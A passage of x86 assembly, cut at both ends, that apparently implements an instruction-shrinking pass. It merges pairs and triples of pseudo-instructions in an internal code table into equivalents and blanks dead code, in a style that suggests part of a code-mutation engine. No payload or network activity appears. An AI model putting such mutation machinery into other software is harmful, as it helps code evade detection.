mov eax, 40h
@@Double_Next_SetInstruction:
mov ebx, [esi]
and ebx, 0FFFFFF00h
and eax, 0FFh
add eax, ebx
mov [esi], eax
@@Double_Next_SetNOP:
mov eax, 0FFh
mov [edi], al
jmp @@EndCompressed
@@Double_Next00:
cmp eax, 50h
jnz @@Double_Next01
mov eax, [edi]
and eax, 0FFh
cmp eax, 58h
jz @@Double_Next_PushPop
cmp eax, 0FEh
jz @@Double_Next00_JMPReg
cmp eax, 59h
jnz @@Double_End
mov eax, [esi+1]
mov ebx, [esi+7]
and ebx, 0FFFFFF00h
and eax, 0FFh
add eax, ebx
mov [esi+7], eax
mov eax, [edi+1]
mov [esi+1], eax
mov eax, [edi+3]
mov [esi+3], eax
mov eax, 43h
jmp @@Double_Next_SetInstruction
@@Double_Next_PushPop:
mov eax, [edi+1]
mov [esi+7], eax
mov eax, 41h
jmp @@Double_Next_SetInstruction
@@Double_Next00_JMPReg:
mov eax, 0EDh
jmp @@Double_Next_SetInstruction
@@Double_Next01:
cmp eax, 51h
jnz @@Double_Next02
mov eax, [edi]
and eax, 0FFh
cmp eax, 58h
jz @@Double_Next01_PushPop
cmp eax, 59h
jnz @@Double_End
@@Double_Next01_MOVMemMem:
mov [esi+7], edi
mov [edi+7], esi
mov eax, 4Fh
jmp @@Double_Next_SetInstruction
@@Double_Next01_PushPop:
mov eax, [edi+1]
mov ebx, [edi+1]
and ebx, 0FFFFFF00h
and eax, 0FFh
add eax, ebx
mov [esi+7], eax
mov eax, 42h
jmp @@Double_Next_SetInstruction
@@Double_Next02:
mov eax, [esi+1]
cmp eax, [edi+1]
jnz @@Double_Next_NoMem
mov eax, [esi+3]
cmp eax, [edi+3]
jnz @@Double_Next_NoMem
mov eax, [esi]
and eax, 0FFh
cmp eax, 0F6h
jz @@Double_Next02_Check
cmp eax, 43h
jnz @@Double_Next03
@@Double_Next02_Check:
mov eax, [edi]
and eax, 0FFh
cmp eax, 51h
jz @@Double_Next02_PushReg
cmp eax, 4Ch
jbe @@Double_Next_OPRegReg
cmp eax, 0EAh
jz @@Double_Next02_CALLMem
cmp eax, 0EBh
jnz @@Double_End
@@Double_Next02_JMPMem:
mov eax, 0EDh
@@Double_Next02_XXXMem:
push eax
mov eax, [esi+7]
mov ebx, [esi+1]
and ebx, 0FFFFFF00h
and eax, 0FFh
add eax, ebx
mov [esi+1], eax
pop eax
jmp @@Double_Next_SetInstruction
@@Double_Next02_CALLMem:
mov eax, 0ECh
jmp @@Double_Next02_XXXMem
@@Double_Next_OPRegReg:
and eax, 7Fh
cmp eax, 3Bh
jz @@Double_Next02_MergeCheck
cmp eax, 4Bh
jz @@Double_Next02_MergeCheck
cmp eax, 4Ah
jz @@Double_Next02_MergeCheck
and eax, 7
cmp eax, 2
jnz @@Double_End
mov eax, [esi+7]
mov [esi+1], eax
mov eax, [edi+7]
mov [esi+7], eax
@@Double_Next02_SetOP:
mov eax, [edi]
and eax, 0F8h
add eax, 1
jmp @@Double_Next_SetInstruction
@@Double_Next02_MergeCheck:
mov eax, [edi+7]
mov [esi+1], eax
jmp @@Double_Next02_SetOP
@@Double_Next02_PushReg:
mov eax, [esi+7]
mov [esi+1], eax
mov eax, 50h
jmp @@Double_Next_SetInstruction
@@Double_Next03:
cmp eax, 0C3h
jnz @@Double_Next04
mov eax, [edi]
and eax, 0FFh
cmp eax, 00h+80h
jb @@Double_End
cmp eax, 4Ch+80h
jbe @@Double_Next_OPRegReg
jmp @@Double_End
@@Double_Next04:
cmp eax, 44h
jnz @@Double_Next05
mov eax, [edi]
and eax, 0FFh
cmp eax, 51h
jz @@Double_Next04_PushImm
cmp eax, 4Ch
ja @@Double_Next05
and eax, 7
cmp eax, 2
jnz @@Double_Next05
@@Double_Next_Merge_MOV_OP:
mov eax, [edi+7]
mov ebx, [esi+1]
and ebx, 0FFFFFF00h
and eax, 0FFh
add eax, ebx
mov [esi+1], eax
mov eax, [edi]
and eax, 0F8h
jmp @@Double_Next_SetInstruction
@@Double_Next04_PushImm:
mov eax, 68h
jmp @@Double_Next_SetInstruction
@@Double_Next05:
mov eax, [esi]
and eax, 0FFh
cmp eax, 44h+80h
jnz @@Double_Next06
mov eax, [edi]
and eax, 0FFh
cmp eax, 00h+80h
jb @@Double_Next06
cmp eax, 4Ch+80h
ja @@Double_Next06
and eax, 7
cmp eax, 2
jnz @@Double_Next06
jmp @@Double_Next_Merge_MOV_OP
@@Double_Next06:
mov eax, [esi]
and eax, 0FFh
cmp eax, 59h
jnz @@Double_Next_NoMem
mov eax, [edi]
and eax, 0FFh
cmp eax, 42h
jz @@Double_Next06_POPReg
cmp eax, 4Fh
jz @@Double_Next06_POPMem
cmp eax, 51h
jz @@Double_Next_SetDoubleNOP
cmp eax, 0EBh
jnz @@Double_Next_NoMem
mov eax, 0FEh
jmp @@Double_Next_SetInstruction
@@Double_Next06_POPReg:
mov eax, [edi+7]
mov [esi+1], eax
mov eax, 58h
jmp @@Double_Next_SetInstruction
@@Double_Next06_POPMem:
mov ebx, [edi+7]
mov eax, [ebx+1]
mov [esi+1], eax
mov eax, [ebx+3]
mov [esi+3], eax
jmp @@Double_Next_SetNOP
@@Double_Next_SetDoubleNOP:
mov eax, 0FFh
jmp @@Double_Next_SetInstruction
@@Double_Next_NoMem:
mov eax, [esi]
and eax, 0FFh
cmp eax, 40h
jnz @@Double_Next07
mov eax, [edi]
and eax, 0FFh
cmp eax, 42h+80h
jz @@Double_Next06_MaybeMOVZX
cmp eax, 1
jnz @@Double_Next07
mov eax, [esi+1]
and eax, 0FFh
mov ebx, [edi+7]
and ebx, 0FFh
cmp eax, ebx
jnz @@Double_Next07
mov eax, [esi+7]
mov [esi+3], eax
mov eax, [esi+1]
mov [esi+7], eax
mov eax, [edi+1]
and eax, 0FFh
mov ebx, [esi+1]
and ebx, 0FFFFFF00h
add eax, ebx
mov [esi+1], eax
@@Double_Next06_SetLEA:
mov eax, [esi+2]
and eax, 0FFFFFF00h
add eax, 8
mov [esi+2], eax
mov eax, 0FCh
jmp @@Double_Next_SetInstruction
@@Double_Next06_MaybeMOVZX:
mov eax, [esi+7]
or eax, eax
jnz @@Double_Next07
mov eax, [esi+1]
and eax, 0FFh
mov ebx, [edi+7]
and ebx, 0FFh
cmp eax, ebx
jnz @@Double_Next07
mov ebx, [edi+1]
and ebx, 0FFh
cmp eax, ebx
jz @@Double_Next07
mov ebx, [edi+2]
and ebx, 0Fh
cmp eax, ebx
jz @@Double_Next07
mov [esi+7], eax
mov eax, [edi+1]
mov [esi+1], eax
mov eax, [edi+3]
mov [esi+3], eax
mov eax, 0F8h
jmp @@Double_Next_SetInstruction
@@Double_Next07:
mov eax, [esi]
and eax, 0FFh
cmp eax, 41h
jnz @@Double_Next08
mov eax, [edi]
and eax, 0FFh
or eax, eax
jz @@Double_Next07_LEA01
cmp eax, 1
jnz @@Double_Next08
mov eax, [esi+7]
and eax, 0FFh
mov ebx, [edi+7]
and ebx, 0FFh
cmp eax, ebx
jnz @@Double_Next08
mov eax, [edi+1]
mov [esi+2], eax
xor eax, eax
mov [esi+3], eax
mov eax, 0FCh
jmp @@Double_Next_SetInstruction
@@Double_Next07_LEA01:
mov eax, [esi+7]
and eax, 0FFh
mov ebx, [edi+1]
and ebx, 0FFh
cmp eax, ebx
jnz @@Double_Next08
mov eax, [edi+7]
mov [esi+3], eax
jmp @@Double_Next06_SetLEA
@@Double_Next08:
mov eax, [esi]
and eax, 0FFh
or eax, eax
jnz @@Double_Next09
mov eax, [edi]
and eax, 0FFh
cmp eax, 01h
jnz @@Double_Next09
mov eax, [esi+1]
and eax, 0FFh
mov ebx, [edi+7]
and ebx, 0FFh
cmp eax, ebx
jnz @@Double_Next09
mov eax, [edi+1]
mov [esi+2], eax
mov eax, [esi+7]
mov [esi+3], eax
mov eax, [esi+1]
mov [esi+7], eax
mov eax, 0FCh
jmp @@Double_Next_SetInstruction
@@Double_Next09:
mov eax, [esi]
and eax, 0FFh
cmp eax, 01h
jnz @@Double_Next10
mov eax, [edi]
and eax, 0FFh
or eax, eax
jnz @@Double_Next10
mov eax, [esi+7]
cmp al, [edi+1]
jnz @@Double_Next10
mov eax, [esi+1]
mov [esi+2], al
mov eax, [esi+7]
mov [esi+1], al
mov eax, [edi+7]
mov [esi+3], eax
mov eax, 0FCh
jmp @@Double_Next_SetInstruction
@@Double_Next10:
xor eax, eax
mov al, [esi]
cmp eax, 4Ch
ja @@Double_Next11
mov al, [edi]
cmp eax, 4Ch
ja @@Double_Next11
mov eax, [esi]
and eax, 7
cmp eax, 4
jz @@Double_Next10_OPMemImm
or eax, eax
jnz @@Double_Next11
@@Double_Next10_OPRegImm:
mov eax, [edi]
and eax, 7
or eax, eax
jnz @@Double_Next11
mov eax, [esi+1]
cmp al, [edi+1]
jnz @@Double_Next11
xor ebx, ebx
@@Double_Next_CalculateOperation:
push ebx
mov ecx, [esi+7]
mov edx, [edi+7]
@@Double_Next_CalculateOperation_2:
mov eax, [edi]
and eax, 78h
mov ebx, eax
mov eax, [esi]
and eax, 78h
call CalculateOperation
pop ebx
cmp eax, 0FEh
jz @@Double_End
cmp eax, 0FFh
jz @@Double_Next_SetNOPAt1st
mov [esi+7], ecx
add eax, ebx
jmp @@Double_Next_SetInstruction
@@Double_Next_SetNOPAt1st:
mov eax, 0FFh
mov [esi], al
jmp @@EndCompressed
@@Double_Next10_OPMemImm:
mov eax, [edi]
and eax, 7
cmp eax, 4
jnz @@Double_Next11
mov eax, [esi+1]
cmp eax, [edi+1]
jnz @@Double_Next11
mov eax, [esi+3]
cmp eax, [edi+3]
jnz @@Double_Next11
mov ebx, 4
jmp @@Double_Next_CalculateOperation
@@Double_Next11:
xor eax, eax
mov al, [esi]
cmp eax, 00h+80h
jb @@Double_Next12
cmp eax, 4Ch+80h
ja @@Double_Next12
mov al, [edi]
cmp eax, 00h+80h
jb @@Double_Next12
cmp eax, 4Ch+80h
ja @@Double_Next12
mov eax, [esi]
and eax, 7
cmp eax, 4
jz @@Double_Next11_OPMemImm_8b
or eax, eax
jnz @@Double_Next12
@@Double_Next11_OPRegImm_8b:
mov eax, [edi]
and eax, 7
or eax, eax
jnz @@Double_Next12
mov ebx, 80h
@@Double_Next11_CalculateOperation_8b:
push ebx
xor eax, eax
mov al, [esi+7]
mov ecx, eax
mov al, [edi+7]
mov edx, eax
jmp @@Double_Next_CalculateOperation_2
@@Double_Next11_OPMemImm_8b:
mov eax, [edi]
and eax, 7
cmp eax, 4
jnz @@Double_Next12
mov eax, [esi+1]
cmp eax, [edi+1]
jnz @@Double_Next12
mov eax, [esi+3]
cmp eax, [edi+3]
jnz @@Double_Next12
mov ebx, 84h
jmp @@Double_Next11_CalculateOperation_8b
@@Double_Next12:
xor eax, eax
mov al, [esi]
cmp eax, 0FCh
jnz @@Double_Next13
mov al, [edi]
cmp eax, 01h
jz @@Double_Next12_MergeLEAADDReg
or eax, eax
jnz @@Double_Next13
@@Double_Next12_MergeLEAADD:
mov eax, [esi+7]
cmp al, [edi+1]
jnz @@Double_Next13
mov eax, [edi+7]
add [esi+3], eax
jmp @@Double_Next_SetNOP
@@Double_Next12_MergeLEAADDReg:
mov eax, [esi+7]
cmp al, [edi+7]
jnz @@Double_Next13
mov eax, 8
cmp al, [esi+1]
jz @@Double_Next12_SetFirstReg
cmp al, [esi+2]
jz @@Double_Next12_SetSecondReg
mov eax, [edi+1]
cmp al, [esi+2]
jz @@Double_Next12_AddScalar
cmp al, [esi+1]
jnz @@Double_Next13
mov eax, [esi+2]
cmp al, 40h
jae @@Double_Next13
push eax
mov eax, [esi+1]
add eax, 40h
mov [esi+2], al
pop eax
mov [esi+1], al
jmp @@Double_Next_SetNOP
@@Double_Next12_AddScalar:
mov eax, [esi+2]
add eax, 40h
mov [esi+2], al
jmp @@Double_Next_SetNOP
@@Double_Next12_SetFirstReg:
mov eax, [edi+1]
mov [esi+1], al
jmp @@Double_Next_SetNOP
@@Double_Next12_SetSecondReg:
mov eax, [edi+1]
mov [esi+2], al
jmp @@Double_Next_SetNOP
@@Double_Next13:
xor eax, eax
mov al, [esi]
cmp eax, 4Fh
jnz @@Double_Next14
mov al, [edi]
cmp eax, 4Fh
jz @@Double_Next13_MergeMOVs
cmp eax, 4Ch
ja @@Double_Next13_NotOPRegMem
@@Double_Next13_OPRegMem_2:
and eax, 7
cmp eax, 2
jz @@Double_Next13_OPRegMem
mov al, [edi]
jmp @@Double_Next13_NotOPRegMem2
@@Double_Next13_NotOPRegMem:
cmp eax, 00h+80h
jb @@Double_Next13_NotOPRegMem2
cmp eax, 4Ch+80h
jbe @@Double_Next13_OPRegMem_2
@@Double_Next13_NotOPRegMem2:
cmp eax, 43h
jz @@Double_Next13_MOVMemReg
cmp eax, 0F6h
jz @@Double_Next13_MOVMemReg
cmp eax, 44h
jz @@Double_Next13_MOVMemImm
cmp eax, 0EAh
jz @@Double_Next13_CALLMem
cmp eax, 0EBh
jnz @@Double_Next14
@@Double_Next13_JMPMem:
@@Double_Next13_CALLMem:
@@Double_Next13_OPRegMem:
mov ebx, [esi+7]
mov eax, [ebx+1]
cmp eax, [edi+1]
jnz @@Double_Next14
mov eax, [ebx+3]
cmp eax, [edi+3]
jnz @@Double_Next14
mov eax, [esi+1]
mov [edi+1], eax
mov eax, [esi+3]
mov [edi+3], eax
jmp @@Double_Next_SetNOPAt1st
@@Double_Next13_MergeMOVs:
mov ebx, [esi+7]
mov eax, [ebx+1]
cmp eax, [edi+1]
jnz @@Double_Next14
mov eax, [ebx+3]
cmp eax, [edi+3]
jnz @@Double_Next14
mov eax, [edi+7]
mov [esi+7], eax
mov [eax+7], esi
jmp @@Double_Next_SetNOP
@@Double_Next13_MOVMemReg:
@@Double_Next13_MOVMemImm:
mov ebx, [esi+7]
mov eax, [ebx+1]
cmp eax, [edi+1]
jnz @@Double_Next14
mov eax, [ebx+3]
cmp eax, [edi+3]
jz @@Double_Next_SetNOPAt1st
@@Double_Next14:
xor eax, eax
mov al, [esi]
cmp eax, 70h
jb @@Double_Next15
cmp eax, 7Fh
ja @@Double_Next15
mov al, [edi]
cmp eax, 0E9h
jz @@Double_Next14_CheckJMP
cmp eax, 70h
jb @@Double_Next15
cmp eax, 7Fh
ja @@Double_Next15
mov eax, [edi+1]
cmp eax, [esi+1]
jnz @@Double_Next15
mov eax, [esi]
and eax, 0Fh
mov ebx, eax
mov eax, [edi]
and eax, 0Fh
call GetRealCheck
cmp eax, 0FFh
jz @@Double_End
add eax, 70h
cmp eax, 0E9h
jz @@Double_Next32_JMP
jmp @@Double_Next_SetInstruction
@@Double_Next14_CheckJMP:
mov eax, [edi+1]
cmp eax, [esi+1]
jz @@Double_Next_SetNOPAt1st
jmp @@Double_End
@@Double_Next15:
@@Double_Next16:
@@Double_Next17:
xor eax, eax
mov al, [esi]
cmp eax, 0E0h
jnz @@Double_Next18
mov ebx, 0E4h
xor ecx, ecx
mov edx, 1
@@Double_Next_Check_NOT_OP:
xor eax, eax
mov al, [edi]
cmp eax, ebx
jz @@Double_Next17_ADDReg
cmp eax, ecx
jnz @@Double_End
@@Double_Next17_NEGReg:
mov eax, [esi+1]
cmp al, [edi+1]
jnz @@Double_End
@@Double_Next17_NEGReg_2:
test ebx, 2
jz @@Double_Next17_Get32
xor eax, eax
mov al, [edi+7]
cmp eax, 80h
jb @@Double_Next17_Cont00
add eax, 0FFFFFF00h
jmp @@Double_Next17_Cont00
@@Double_Next17_Get32:
mov eax, [edi+7]
@@Double_Next17_Cont00:
cmp eax, edx
jnz @@Double_End
mov eax, ebx
jmp @@Double_Next_SetInstruction
@@Double_Next17_ADDReg:
mov eax, [esi+1]
cmp al, [edi+1]
jnz @@Double_End
@@Double_Next17_ADDReg_2:
mov eax, edx
mov [esi+7], eax
mov eax, ecx
jmp @@Double_Next_SetInstruction
@@Double_Next18:
cmp eax, 0E2h
jnz @@Double_Next19
mov ebx, 0E6h
mov ecx, 80h
mov edx, 1
jmp @@Double_Next_Check_NOT_OP
@@Double_Next19:
cmp eax, 0E4h
jnz @@Double_Next20
mov ebx, 0E0h
xor ecx, ecx
mov edx, -1
jmp @@Double_Next_Check_NOT_OP
@@Double_Next20:
cmp eax, 0E6h
jnz @@Double_Next21
mov ebx, 0E2h
mov ecx, 80h
mov edx, -1
jmp @@Double_Next_Check_NOT_OP
@@Double_Next21:
cmp eax, 0E1h
jnz @@Double_Next22
mov ebx, 0E5h
mov ecx, 4
mov edx, 1
@@Double_Next_Check_NOT_OP_Mem:
xor eax, eax
mov al, [edi]
cmp eax, ebx
jz @@Double_Next21_ADDMem
cmp eax, ecx
jnz @@Double_End
@@Double_Next21_NEGMem:
mov eax, [esi+1]
cmp eax, [edi+1]
jnz @@Double_End
mov eax, [esi+3]
cmp eax, [edi+3]
jnz @@Double_End
xor eax, eax
jmp @@Double_Next17_NEGReg_2
@@Double_Next21_ADDMem:
mov eax, [esi+1]
cmp eax, [edi+1]
jnz @@Double_End
mov eax, [esi+3]
cmp eax, [edi+3]
jnz @@Double_End
xor eax, eax
jmp @@Double_Next17_ADDReg_2
@@Double_Next22:
cmp eax, 0E3h
jnz @@Double_Next23
mov ebx, 0E7h
mov ecx, 84h
mov edx, 1
jmp @@Double_Next_Check_NOT_OP_Mem
@@Double_Next23:
cmp eax, 0E5h
jnz @@Double_Next24
mov ebx, 0E1h
mov ecx, 4
mov edx, -1
jmp @@Double_Next_Check_NOT_OP_Mem
@@Double_Next24:
cmp eax, 0E7h
jnz @@Double_Next25
mov ebx, 0E3h
mov ecx, 84h
mov edx, -1
jmp @@Double_Next_Check_NOT_OP_Mem
@@Double_Next25:
@@Double_Next26:
@@Double_Next27:
@@Double_Next28:
@@Double_Next29:
cmp eax, 0EAh
jnz @@Double_Next30
@@Double_Next29_CheckAPICALL_STORE:
mov al, [edi]
cmp eax, 43h
jnz @@Double_End
mov al, [edi+7]
or eax, eax
jnz @@Double_End
mov eax, 0F6h
mov [edi], al
xor eax, eax
mov [edi+7], eax
jmp @@EndCompressed
@@Double_Next30:
cmp eax, 0ECh
jz @@Double_Next29_CheckAPICALL_STORE
@@Double_Next31:
cmp eax, 42h
jnz @@Double_Next32
mov eax, [edi]
and eax, 0FFh
cmp eax, 20h
jz @@Double_Next31_MaybeMOVZX
mov al, [esi+7]
cmp eax, 2
ja @@Double_Next32
cmp al, [edi+1]
jnz @@Double_Next32
mov al, [edi]
cmp eax, 0ECh
jnz @@Double_Next32
sub eax, 2
jmp @@Double_Next_SetInstruction
@@Double_Next31_MaybeMOVZX:
mov eax, [edi+7]
cmp eax, 0FFh
jnz @@Double_Next32
mov eax, [esi+7]
and eax, 0FFh
mov ebx, [edi+1]
and ebx, 0FFh
cmp eax, ebx
jnz @@Double_Next32
mov eax, [esi+1]
and eax, 0FFh
cmp eax, ebx
jz @@Double_Next32
mov eax, [esi+2]
and eax, 0Fh
cmp eax, ebx
jz @@Double_Next32
mov eax, 0F8h
jmp @@Double_Next_SetInstruction
@@Double_Next32:
xor eax, eax
mov al, [esi]
cmp eax, 39h
jnz @@Double_Next33
@@Double_Next32_Common:
mov al, [edi]
cmp eax, 70h
jb @@Double_End
cmp eax, 7Fh
ja @@Double_End
mov al, [esi+1]
mov ebx, eax
mov al, [esi+7]
cmp eax, ebx
jnz @@Double_End
mov eax, [edi]
and eax, 07h
cmp eax, 1
jz @@Double_Next32_JMP
cmp eax, 6
jz @@Double_Next32_JMP
mov eax, [edi]
and eax, 0Fh
cmp eax, 2
jbe @@Double_Next32_NOP
cmp eax, 4
jbe @@Double_Next32_JMP
cmp eax, 0Ah
jz @@Double_Next32_JMP
cmp eax, 0Dh
jz @@Double_Next32_JMP
@@Double_Next32_NOP:
mov eax, 0FFh
mov [edi], eax
jmp @@EndCompressed
@@Double_Next32_JMP:
mov eax, 0E9h
mov [edi], al
mov edx, edi
@@Double_Next32_EliminateNonReachableCode:
add edx, 10h
cmp edx, [ebp+AddressOfLastInstruction]
jae @@EndCompressed
mov al, [edx+0Bh]
or eax, eax
jnz @@EndCompressed
mov eax, 0FFh
mov [edx], eax
jmp @@Double_Next32_EliminateNonReachableCode
@@Double_Next33:
cmp eax, 39h+80h
jz @@Double_Next32_Common
@@Double_End:
@@Check_Triple:
mov edx, esi
mov esi, edi
call IncreaseEIP
cmp edi, [ebp+AddressOfLastInstruction]
jz @@EndNoCompressed
xor eax, eax
mov al, [edi+0Bh]
or eax, eax
jnz @@EndNoCompressed
@@Triple_Next00:
mov al, [edx]
cmp eax, 43h
jnz @@Triple_Next01
mov eax, [edx+1]
cmp eax, [esi+1]
jnz @@Triple_Next01
mov eax, [edx+3]
cmp eax, [esi+3]
jnz @@Triple_Next01
mov eax, [edi]
cmp al, 42h
jz @@Triple_Next00_Constr00
cmp al, 70h
jb @@Triple_Next01
cmp al, 7Fh
ja @@Triple_Next01
mov eax, [esi]
and eax, 0F8h
or eax, eax
jz @@Triple_Next00_Maybe01
cmp eax, 28h
jz @@Triple_Next00_Maybe01
cmp eax, 38h
jz @@Triple_Next00_Maybe01
cmp eax, 48h
jz @@Triple_Next00_Maybe01
cmp eax, 20h
jnz @@Triple_End
@@Triple_Next00_Maybe01:
xor ebx, ebx
@@Triple_Next00_CheckCMPTEST:
mov eax, [esi]
and eax, 07Fh
cmp eax, 48h
jb @@Triple_Next00_CheckCMPTEST_00
and eax, 7
cmp eax, 2
jz @@Triple_Next00_CMPTESTRegReg
jmp @@Triple_Next00_CheckCMPTEST_01
@@Triple_Next00_CheckCMPTEST_00:
and eax, 7
cmp eax, 3
jz @@Triple_Next00_CMPTESTRegReg
@@Triple_Next00_CheckCMPTEST_01:
cmp eax, 4
jnz @@Triple_End
@@Triple_Next00_CMPTESTRegImm:
mov eax, [edx+7]
mov [esi+1], al
@@Triple_Next00_SET_CMPTEST:
mov eax, [esi]
and eax, 78h
cmp eax, 48h
jz @@Triple_Next00_SetInstruction
cmp eax, 20h
jz @@Triple_Next00_Cont80
cmp eax, 38h
jz @@Triple_Next00_SetInstruction
or eax, eax
jz @@Triple_Next00_NegateImm
@@Triple_Next00_SetCMP:
mov eax, 38h
jmp @@Triple_Next00_SetInstruction
@@Triple_Next00_NegateImm:
mov eax, [esi+7]
neg eax
mov [esi+7], eax
jmp @@Triple_Next00_SetCMP
@@Triple_Next00_Cont80:
mov eax, 48h
@@Triple_Next00_SetInstruction:
add eax, ebx
mov [esi], al
mov eax, 0FFh
mov [edx], al
jmp @@EndCompressed
@@Triple_Next00_CMPTESTRegReg:
mov eax, [esi]
and eax, 78h
or eax, eax
jz @@Triple_End
mov eax, [esi+7]
mov [esi+1], al
mov eax, [edx+7]
mov [esi+7], al
add ebx, 1
jmp @@Triple_Next00_SET_CMPTEST
@@Triple_Next00_Constr00:
mov eax, [esi]
cmp al, 4Ch
ja @@Triple_Next01
xor ebx, ebx
@@Triple_Next00_Common:
mov eax, [esi]
and eax, 78h
cmp eax, 48h
jb @@Triple_Next00_Common_00
mov eax, [esi]
and eax, 7
cmp eax, 2
jz @@Triple_Next00_Maybe00
jmp @@Triple_Next00_Common_01
@@Triple_Next00_Common_00:
mov eax, [esi]
and al, 7
cmp al, 3
jz @@Triple_Next00_Maybe00
@@Triple_Next00_Common_01:
cmp al, 4
jnz @@Triple_End
@@Triple_Next00_Maybe00:
mov eax, [edx+1]
cmp eax, [esi+1]
jnz @@Triple_End
cmp eax, [edi+1]
jnz @@Triple_End
mov eax, [edx+3]
cmp eax, [esi+3]
jnz @@Triple_End
cmp eax, [edi+3]
jnz @@Triple_End
mov eax, [edx+7]
cmp al, [edi+7]
jnz @@Triple_End
mov eax, [esi]
and eax, 78h
cmp eax, 48h
jb @@Triple_Next00_00
mov eax, [esi]
and eax, 7
cmp eax, 2
jz @@Triple_Next00_Maybe_OPRegReg
jmp @@Triple_Next00_01
@@Triple_Next00_00:
mov eax, [esi]
and eax, 7
cmp eax, 3
jz @@Triple_Next00_Maybe_OPRegReg
@@Triple_Next00_01:
mov eax, [edx+7]
mov [edx+1], al
mov eax, [esi+7]
mov [edx+7], eax
mov eax, [esi]
and eax, 78h
add eax, ebx
@@Triple_Next_SetInstruction:
mov [edx], al
@@Triple_Next_SetNOP:
mov eax, 0FFh
mov [esi], al
mov [edi], al
jmp @@EndCompressed
@@Triple_Next00_Maybe_OPRegReg:
mov eax, [esi+7]
mov [edx+1], eax
mov eax, [edi+7]
mov [edx+7], eax
mov eax, [esi]
and eax, 0F8h
add eax, 1
jmp @@Triple_Next_SetInstruction
@@Triple_Next01:
mov eax, [edx]
cmp al, 43h+80h
jnz @@Triple_Next02
mov eax, [edx+1]
cmp eax, [esi+1]
jnz @@Triple_Next02
mov eax, [edx+3]
cmp eax, [esi+3]
jnz @@Triple_Next02
mov eax, [edi]
cmp al, 42h+80h
jz @@Triple_Next01_Constr00
cmp al, 70h
jb @@Triple_Next02
cmp al, 7Fh
ja @@Triple_Next02
mov eax, [esi]
and eax, 0F8h
cmp eax, 00h+80h
jz @@Triple_Next01_Maybe01
cmp eax, 28h+80h
jz @@Triple_Next01_Maybe01
cmp eax, 38h+80h
jz @@Triple_Next01_Maybe01
cmp eax, 48h+80h
jz @@Triple_Next01_Maybe01
cmp eax, 20h+80h
jnz @@Triple_End
@@Triple_Next01_Maybe01:
mov ebx, 80h
jmp @@Triple_Next00_CheckCMPTEST
@@Triple_Next01_Constr00:
mov ebx, 80h
mov eax, [esi]
cmp al, 4Ch+80h
ja @@Triple_Next02
cmp al, 00h+80h
jae @@Triple_Next00_Common
@@Triple_Next02:
mov eax, [edx]
cmp al, 4Fh
jnz @@Triple_Next03
mov eax, [edi]
cmp al, 70h
jb @@Triple_Next02_ContCheck
cmp al, 7Fh
ja @@Triple_Next02_ContCheck
mov ebx, [edx+7]
mov eax, [ebx+1]
cmp eax, [esi+1]
jnz @@Triple_End
mov eax, [ebx+3]
cmp eax, [esi+3]
jnz @@Triple_End
mov eax, [esi]
and eax, 78h
cmp eax, 20h
jz @@Triple_Next02_CheckCMPTESTMemReg
cmp eax, 28h
jz @@Triple_Next02_CheckCMPTESTMemReg
cmp eax, 38h
jz @@Triple_Next02_CheckCMPTESTMemReg
cmp eax, 48h
jnz @@Triple_Next03
@@Triple_Next02_CheckCMPTESTRegMem:
@@Triple_Next02_CheckCMPTESTMemReg:
mov eax, [edx+1]
mov [esi+1], eax
mov eax, [edx+3]
mov [esi+3], eax
mov eax, 0FFh
mov [edx], eax
mov eax, [esi]
and eax, 78h
cmp eax, 38h
jz @@EndCompressed
cmp eax, 48h
jz @@EndCompressed
cmp eax, 20h
jz @@Triple_Next02_SetTEST
mov ebx, 10h
@@Triple_Next02_ConvertInstruction:
mov eax, [esi]
add eax, ebx
mov [esi], eax
jmp @@EndCompressed
@@Triple_Next02_SetTEST:
mov ebx, 28h
jmp @@Triple_Next02_ConvertInstruction
@@Triple_Next02_ContCheck:
cmp al, 4Fh
jnz @@Triple_Next03
mov eax, [esi]
cmp al, 4Ch
jbe @@Triple_Next02_CommonOperation
cmp al, 00h+80h
jb @@Triple_Next03
cmp al, 4Ch+80h
ja @@Triple_Next03
@@Triple_Next02_CommonOperation:
cmp eax, 0F6h
jz @@Triple_Next02_OPMemReg
and eax, 78h
cmp eax, 48h
jb @@Triple_Next02_00
mov eax, [esi]
and eax, 7
cmp eax, 2
jz @@Triple_Next02_OPMemReg
jmp @@Triple_Next02_01
@@Triple_Next02_00:
mov eax, [esi]
and eax, 7
cmp eax, 3
jz @@Triple_Next02_OPMemReg
@@Triple_Next02_01:
cmp eax, 4
jnz @@Triple_End
@@Triple_Next02_OPMemImm:
@@Triple_Next02_OPMemReg:
mov ebx, [edx+7]
mov eax, [ebx+1]
cmp eax, [edi+1]
jnz @@Triple_End
cmp eax, [esi+1]
jnz @@Triple_End
mov eax, [ebx+3]
cmp eax, [edi+3]
jnz @@Triple_End
cmp eax, [esi+3]
jnz @@Triple_End
mov ebx, [edi+7]
mov eax, [ebx+1]
cmp eax, [edx+1]
jnz @@Triple_End
mov eax, [ebx+3]
cmp eax, [edx+3]
jnz @@Triple_End
mov eax, [edx+1]
mov [esi+1], eax
mov eax, [edx+3]
mov [esi+3], eax
@@Triple_Next_SetNOP_1_3:
mov eax, 0FFh
mov [edx], al
mov [edi], al
jmp @@EndCompressed
@@Triple_Next03:
mov eax, [edx]
cmp al, 44h
jnz @@Triple_Next04
mov eax, [edi]
cmp al, 42h
jz @@Triple_Next03_Constr00
cmp al, 70h
jb @@Triple_Next04
cmp al, 7Fh
ja @@Triple_Next04
mov eax, [esi]
@@Triple_Next03_Check_CMP_TEST:
cmp al, 3Ah
jz @@Triple_Next03_CMPRegImm
cmp al, 4Ah
jnz @@Triple_End
@@Triple_Next03_CMPRegImm:
@@Triple_Next03_TESTRegImm:
mov eax, [esi]
and eax, 0F8h
mov [edx], al
mov eax, [esi+7]
mov [edx+1], al
mov eax, 0FFh
mov [esi], al
jmp @@EndCompressed
@@Triple_Next03_Constr00:
mov eax, [esi]
cmp eax, 0F6h
jz @@Triple_Next03_Common_F6
cmp al, 4Ch
ja @@Triple_Next04
@@Triple_Next03_Common:
and eax, 78h
cmp eax, 48h
jb @@Triple_Next03_00
mov eax, [esi]
and eax, 7
cmp eax, 2
jz @@Triple_Next03_Common_F6
jmp @@Triple_End
@@Triple_Next03_00:
mov eax, [esi]
and eax, 7
cmp eax, 3
jnz @@Triple_End
@@Triple_Next03_Common_F6:
mov eax, [edx+1]
cmp eax, [esi+1]
jnz @@Triple_End
cmp eax, [edi+1]
jnz @@Triple_End
mov eax, [edx+3]
cmp eax, [esi+3]
jnz @@Triple_End
cmp eax, [edi+3]
jnz @@Triple_End
mov eax, [esi+7]
mov [edx+1], eax
mov eax, [esi]
and eax, 0F8h
